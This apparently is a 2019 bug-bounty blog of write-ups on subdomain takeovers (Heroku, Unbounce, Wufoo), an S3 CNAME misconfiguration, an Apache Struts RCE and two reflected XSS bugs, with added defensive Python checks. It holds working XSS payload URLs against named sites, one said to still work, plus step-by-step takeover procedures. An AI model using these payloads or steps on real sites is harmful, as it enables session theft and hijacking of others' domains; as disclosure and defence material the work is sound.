Apr 13, 2019

[ Special Case ] HerokuDNS is Still Vulnerable to Subdomain Takeovers ( Live PoC )




Today I will share a new finding about
Subdomain Takeovers
via HerokuDNS
[ Edge Case ]

Many blogs say you can't take over from herokudns any more
because they now use a random CNAME generator.

In this blog I will explain how I could take over this domain
and add it to the Custom Domains list on my Heroku dashboard.
-----------------------------------------------
Explained
simply:
1) You see a page like this pic,
which shows you the title " No Such App "


2) Now look at the DNS of the subdomain;
if you find it like this ( IPs )

3) You can add it directly to your Heroku account as a custom domain of any app.
Yes, when you add it you will get a random CNAME, as happened when I added dns-scratch.me to my account.



4) The domain or subdomain is now connected.



---------------------------------------------------------

Apr 12, 2019

[RCE] Remote code execution at api.PrivateProgram.com (CVE-2017-5638)





Apache Struts CVE-2017-5638 
Remote Code Execution Vulnerability
Program : Private on HackerOne
Bounty : 2000$ and 250$ Bonus
Subdomain : Api.Private.com


Today I will post my new finding:
remote code execution
in the API subdomain of a private program,
which was running a vulnerable version of Apache Struts
(CVE-2017-5638)

CVE-2017-5638 description :
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
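Two checks a defender can run from that description alone, as an added example (not code from the original post, from the program, or from Apache Struts): a version test using exactly the ranges the CVE text gives, and a scan of a raw HTTP request for the three named headers carrying an OGNL expression opener or the "#cmd=" marker. The sample requests are constructed here, not captured traffic.

```python
import re
from typing import List, Tuple

# Vulnerable ranges exactly as the CVE-2017-5638 text above states them:
# 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1.
FIXED_2_3 = (2, 3, 32)
FIXED_2_5 = (2, 5, 10, 1)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.5.10.1' into (2, 5, 10, 1) so tuples compare numerically."""
    return tuple(int(part) for part in version.strip().split("."))


def struts_is_vulnerable(version: str) -> bool:
    """True when a Struts 2 version string falls in a range the CVE names."""
    v = parse_version(version)
    if v[:2] == (2, 3):
        return v < FIXED_2_3
    if v[:2] == (2, 5):
        return v < FIXED_2_5
    return False  # other branches are outside the ranges the CVE describes


# The CVE text names three upload-related headers and a "#cmd=" marker; OGNL
# expressions open with "%{" or "${", which never belongs in these headers.
WATCHED_HEADERS = ("content-type", "content-disposition", "content-length")
OGNL_OPENER = re.compile(r"[%$]\{")
CMD_MARKER = re.compile(r"#cmd\s*=", re.IGNORECASE)


def suspicious_headers(raw_request: str) -> List[str]:
    """Names of watched headers in a raw HTTP request carrying an OGNL expression."""
    hits = []
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name = name.strip().lower()
        if name in WATCHED_HEADERS and (OGNL_OPENER.search(value) or CMD_MARKER.search(value)):
            hits.append(name)
    return hits


# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = (
    "POST /upload HTTP/1.1\r\n"
    "Host: api.example.com\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4\r\n"
    "Content-Length: 0\r\n\r\n"
)
FLAGGED_REQUEST = (
    "POST /upload HTTP/1.1\r\n"
    "Host: api.example.com\r\n"
    "Content-Type: %{#cmd='REDACTED'}\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for ver in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        print(ver, "vulnerable" if struts_is_vulnerable(ver) else "fixed")
    print(suspicious_headers(FLAGGED_REQUEST))
```

The version test is the cheap fix check (upgrade to 2.3.32 / 2.5.10.1 or later); the header scan is what a WAF rule or log search for this CVE keys on, since a legitimate multipart upload never puts an expression opener in Content-Type.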

Poc was : 


References : 





----------------------------------------------------------

Mar 19, 2019

Feb 26, 2019

[Still work] Redirect Yahoo Subdomain XSS Reflected from americangreetings.com






Bug Type : Reflected XSS
Affected Site : americangreetings.com 
Yahoo Subdomain : greetings.yahoo.com


Description 
I've reported this to Yahoo and American Greetings but it was marked as informative,
so they don't mind disclosing it.

This XSS still works

I've found that the Yahoo subdomain greetings.yahoo.com redirects to any path on americangreetings.com

So I tried to get a reflected XSS on americangreetings.com in its paths

The XSS affected this path
/search-results/{xss payload}

************************************
The fix I suggested to Yahoo was
to do what
greetings.yahoo.ca does:
it redirects only to the site home.

***************************************

Poc link : 

http://greetings.yahoo.com/search-results/'"--><Details Open OnToggle=confirm`Haron`>

https://www.americangreetings.com/search-results/'%22--%3e%3cDetails%20Open%20OnToggle=confirm%60Haron%60%3e
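Both sides of the fix, as an added example (not code from the original post, from Yahoo or from American Greetings): the path-forwarding redirect the post describes next to the home-only redirect suggested to Yahoo, and HTML-escaping of the reflected search term on the target site. The function names and the `AG_HOME` constant are assumptions made for this illustration; the sample term is the payload text from the PoC link above.

```python
import html

AG_HOME = "https://www.americangreetings.com/"  # assumed fixed target


def redirect_location_path_forwarding(request_path: str) -> str:
    """Behaviour the post describes: the requested path is carried over to the
    target site, so anything reflected there is reachable from this host."""
    return AG_HOME.rstrip("/") + request_path


def redirect_location_home_only(request_path: str) -> str:
    """The fix suggested to Yahoo: always redirect to the site home, like
    greetings.yahoo.ca, ignoring the requested path entirely."""
    return AG_HOME


def render_search_results(term: str) -> str:
    """Fix on the reflecting side: HTML-escape the term before placing it in
    the page, so markup in it renders as text rather than tags."""
    return "<h1>Results for {}</h1>".format(html.escape(term, quote=True))


# The payload text from the PoC link above, used only as sample input.
SAMPLE_TERM = "'\"--><Details Open OnToggle=confirm`Haron`>"

if __name__ == "__main__":
    print(redirect_location_path_forwarding("/search-results/" + SAMPLE_TERM))
    print(redirect_location_home_only("/search-results/" + SAMPLE_TERM))
    print(render_search_results(SAMPLE_TERM))
```

The home-only redirect removes the Yahoo host from the attack surface regardless of what the target site does; the escaping is what closes the reflection itself, and the two are independent.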


*************************************


Feb 22, 2019

AWS s3 Buckets Create





Amazon AWS S3 buckets are simple and can be created by everyone.

************************
Steps to create an S3 bucket

1) You must create an Amazon AWS account first ( requires a credit card ).
AWS asks for your payment information to verify your identity; they will not charge you unless your usage exceeds the AWS Free Tier limits.


2) Creating a bucket is simple, as you see in the pic

3) Enter your bucket name.
I've chosen HaronBucket.
Please remember this will be your bucket link;
example, as mine:
haronbucket.s3.amazonaws.com
s3.amazonaws.com/haronbucket


Click Next, then Next again if you don't need a special config or permissions.



After clicking Create Bucket,
your bucket will be shown in the Buckets home.


**********************************
Now uploading your files is very easy:
1) Go to your buckets home
2) Choose the bucket you want to upload files to,
or go to this link ( add your bucket name )
https://s3.console.aws.amazon.com/s3/buckets/your-bucket/


3) Click on Get Started and choose the files you want to upload :) then click Upload

4) Your uploaded file will be shown in your bucket's files; click on the file you uploaded




5) Click on Make Public and scroll down; you will see your file's public link


Subdomain Misconfiguration Leads to AWS S3 Buckets Reader




Bug Type : Subdomain misconfiguration
Program : Private on HackerOne
Severity : P2 ( High )
Bounty : 600$ + 200$ Bonus
Subdomain : images.example.com

************************************
How I found this bug:
it was simple. When I went directly to https://images.example.com I found it redirected to https://aws.amazon.com/s3/

So I started looking for the CNAME, and it was
images.example.com  >  s3.amazonaws.com

Here was the bug; I saw many companies make the same error.
Developers must add a whitelist of S3 buckets.

So now I can call any bucket on images.example.com

example : images.example.com/haron-bucket/




************************
Steps to find this error are very simple:
if the subdomain has the alias s3.amazonaws.com,
try to add your bucket directly to the subdomain,
example : subdomain.site.com/yourbucket/yourfile.html
if it loads, it is vulnerable; if not, this means the developers added a bucket whitelist.

******************************************


Please see this write-up on creating your bucket
https://www.mohamedharon.com/2019/02/aws-s3-buckets-create.html




*********************************************************


Feb 18, 2019

2 Subdomains Takeover via Unbounce in a Private Program









Many researchers asked me whether this takeover still exists or is fixed.
Yes, this takeover still exists, with 3 scenarios,
as Akita Zen said


*****************************
Bug Type : Subdomain Takeover 
Service : Unbounce 
Severity : Critical 
Program : Private on Hackerone
Status : Duplicate after fixing it

*************************
In a private program on HackerOne I found 2 subdomains,
get.example.com
try.example.com
which had a CNAME pointing to unbouncepages.com
and showed me the takeover error ( fingerprint ).
So I made an account and tried to add the domain to my page on Unbounce, and it connected successfully.


Steps to take over
1) Create an account on Unbounce with a credit card
2) Create your Unbounce page
3) Add a domain to your page.
If it tells you the domain is already taken, this means there is no takeover.
example : info.hacker.one
It shows us the takeover fingerprint, but it is already working and added to another account, so there is no takeover in it.




Timeline 
Reported : 6 Nov,2018
Triaged : 7 Nov,2018
I noticed that they fixed it : 7 Nov,2018, after 2 hours
Duplicate : 10 Nov,2018


******************************

Feb 17, 2019

Reflected XSS in GoodHire.com CMS







Program : inflection
Bug Type : Reflected XSS
Severity : High 
Domain : GoodHire.com
Bounty : 0$ + Bonus 150$

******************************
The affected parameter was in HubSpot CMS:
referrerUrl
Affected path:
/_hcms/cta

**********************************
Payload
{%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:""//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


**********************************
Poc was : 
https://www.goodhire.com/_hcms/cta?referrerUrl={%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:%22%22//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


***********************************
For more about this bug please visit my write-up






****************************************

Feb 16, 2019

Subdomain Takeover via Wufoo Service in a Private Program







Program : Private Program On Hackerone
Bug Type : Subdomain Takeover
Service : WUFOO
Severity :  Medium (because it redirects)
Reward : 500$
Subdomain : Bug.example.com

*********************************
Wufoo 
Wufoo's HTML form builder helps you create online web forms. Use our web form creator to power your contact forms, online surveys, and event registrations.

*************************************
Steps and how I found this bug

When I went directly to the subdomain
it redirected me to another subdomain and showed me this error


First I noticed " Profile Not Found ",
so I searched about Wufoo to see what it does

1) When you create a free profile on Wufoo
they give you a subdomain for your profile

yourprofile.wufoo.com

2) You can change it later, so I changed it to the subdomain's CNAME, which was not found

3) I created a form to provide more PoC


4) It seems this PoC is enough; if you want to add a page or JavaScript code
you will have to upgrade your free account
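How a site owner can audit their own DNS zone for the patterns in the Heroku, S3, Unbounce and Wufoo write-ups above, as one added example serving all four (not code from the original posts or from any of those vendors): it parses CNAME records, flags a CNAME to a bare S3 endpoint (any bucket reachable, as in the S3 post), and for CNAMEs into the three services checks the subdomain's response body for the error text the posts quote. The zone listing, response bodies and the `fetch_body` hook are constructed here; the Unbounce error text is not given on the page, so its entry is a labelled placeholder.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

# Error text quoted in the write-ups above. The Unbounce error text is not given
# on the page, so it is a placeholder to be replaced with the real string.
SERVICE_FINGERPRINTS: Dict[str, str] = {
    "herokudns.com": "No such app",
    "herokuapp.com": "No such app",
    "wufoo.com": "Profile not found",
    "unbouncepages.com": "<UNBOUNCE-ERROR-TEXT-PLACEHOLDER>",
}

# A CNAME straight to an S3 endpoint with no bucket name in front means
# /<bucket>/<key> on the subdomain reaches any bucket, as the S3 post describes.
BARE_S3_ENDPOINT = re.compile(r"^s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com$")


def parse_cname_records(zone_text: str) -> List[Tuple[str, str]]:
    """Extract (name, target) pairs from zone-file style lines containing CNAME."""
    records = []
    for line in zone_text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[-2].upper() == "CNAME":
            name = parts[0].rstrip(".").lower()
            target = parts[-1].rstrip(".").lower()
            records.append((name, target))
    return records


def classify(name: str, target: str,
             fetch_body: Callable[[str], Optional[str]]) -> str:
    """Label one CNAME record.

    fetch_body(host) returns the HTTP body served for the subdomain, or None
    when nothing answers; injecting it keeps the audit runnable offline.
    """
    if BARE_S3_ENDPOINT.match(target):
        # Fix: point the record at one bucket host (bucket.s3.amazonaws.com)
        # or proxy only an allowed list of buckets.
        return "s3-any-bucket-reachable"
    for suffix, fingerprint in SERVICE_FINGERPRINTS.items():
        if target == suffix or target.endswith("." + suffix):
            body = fetch_body(name)
            if body is not None and fingerprint.lower() in body.lower():
                # The error text alone is not proof of a takeover (the Unbounce
                # post notes a name can show it yet be claimed by another
                # account); treat it as "verify or remove this record".
                return "dangling-" + suffix.split(".")[0]
            return "third-party-check-ownership"
    return "ok"


def audit_zone(zone_text: str,
               fetch_body: Callable[[str], Optional[str]]) -> Dict[str, str]:
    """Run classify() over every CNAME in the zone listing."""
    return {name: classify(name, target, fetch_body)
            for name, target in parse_cname_records(zone_text)}


# Constructed sample zone and response bodies (not real records).
SAMPLE_ZONE = """\
images.example.com.  300 IN CNAME s3.amazonaws.com.
bug.example.com.     300 IN CNAME bug-example.wufoo.com.
get.example.com.     300 IN CNAME get-example.unbouncepages.com.
app.example.com.     300 IN CNAME random-words-1234.herokudns.com.
www.example.com.     300 IN CNAME www.example.com.cdn.example.net.
api.example.com.     300 IN A     192.0.2.10
"""
SAMPLE_BODIES = {
    "bug.example.com": "<h1>Profile Not Found</h1>",
    "app.example.com": "<title>No such app</title>",
    "get.example.com": "<html>a published landing page</html>",
}


def offline_fetch(host: str) -> Optional[str]:
    """Stand-in for an HTTP GET: look the body up in the constructed samples."""
    return SAMPLE_BODIES.get(host)


if __name__ == "__main__":
    for host, finding in audit_zone(SAMPLE_ZONE, offline_fetch).items():
        print(f"{host:22} {finding}")
```

Run against a real zone export, `fetch_body` would be a short-timeout HTTP GET of the subdomain; every `dangling-*` result is a record to delete or re-claim at the vendor, and every `third-party-check-ownership` result is a record whose vendor-side owner should be confirmed, since the Unbounce post shows a fingerprint can appear on a name that is already claimed.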




**********************************